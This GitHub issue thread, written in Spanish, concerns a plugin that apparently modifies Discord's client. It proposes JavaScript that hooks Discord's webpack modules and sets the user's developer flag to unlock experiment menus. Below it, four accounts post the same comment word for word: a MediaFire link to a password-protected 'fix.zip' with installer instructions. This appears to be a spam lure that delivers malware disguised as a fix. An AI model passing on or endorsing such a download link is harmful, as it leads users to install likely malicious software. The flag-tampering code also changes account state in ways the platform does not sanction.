### ISSUE TITLE
Actualización del Método experiments para Mejorar la Compatibilidad y Manejo de Errores

### ISSUE THREAD

**Issue by SrGobi** [SrGobi/BDNitro#2]
Se ha actualizado el método experiments para mejorar la forma en la que se acceden y manipulan las configuraciones de experimentos de Discord. La nueva implementación hace que el proceso sea más estable y fácil de mantener, además de agregar un mejor manejo de errores.

## Cambios Realizados:
1. Acceso Optimizado a los Módulos de Discord:

- Se optimizó la forma en la que se acceden los módulos de Discord usando webpackChunkdiscord_app.
- El acceso se realiza de manera asíncrona para asegurar que los módulos se carguen correctamente.

2. Mejora en el Manejo de Errores:

- Se añadió un manejo de errores más robusto utilizando try/catch, lo que facilita la depuración si algo falla.
- Cuando ocurre un error, se muestra una notificación en Discord para que el usuario pueda reportar el problema directamente en GitHub.

3. Limpieza y Simplicidad:

- La nueva implementación utiliza menos código repetitivo, mejorando la legibilidad y simplicidad del método.

```js
async experiments() {
    try {
        let c;
        webpackChunkdiscord_app.push([[Symbol()], {}, r => c = r.c]);
        webpackChunkdiscord_app.pop();

        let u = Object.values(c).find(x => x?.exports?.default?.getUsers).exports.default;
        let m = Object.values(u._dispatcher._actionHandlers._dependencyGraph.nodes);

        // Activar los flags de desarrollador
        u.getCurrentUser().flags |= 1;

        // Abrir la conexión del experiment store
        m.find((x) => x.name === "DeveloperExperimentStore").actionHandler["CONNECTION_OPEN"]();

        // Inicializar la superposición del store de experimentos
        try { 
            m.find((x) => x.name === "ExperimentStore").actionHandler["OVERLAY_INITIALIZE"]({ user: { flags: 1 } });
        } catch { /* Si falla, ignorar el error */ }

        // Notificar cambios en el store de experimentos
        m.find((x) => x.name === "ExperimentStore").storeDidChange();

    } catch (err) {
        // Registro del error en la consola
        console.log(err);

        // Mostrar notificación de error en Discord con un botón para reportar el problema
        BdApi.showNotice("[BDNitro] An error occurred with the DiscordExperiments plugin", { 
            type: "error", 
            buttons: [{ 
                label: "Issue", 
                onClick: () => window.open("https://github.com/srgobi/DBNitro/issues", "mozillaTab") 
            }] 
        });

        // Otra notificación con un botón adicional para reportar el problema
        BdApi.showNotice("[BDNitro] Error: %error%", { 
            type: "error", 
            buttons: [{ 
                label: "Report", 
                onClick: () => window.open("https://github.com/srgobi/DBNitro/issues", "mozillaTab") 
            }] 
        });
    }
}

```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
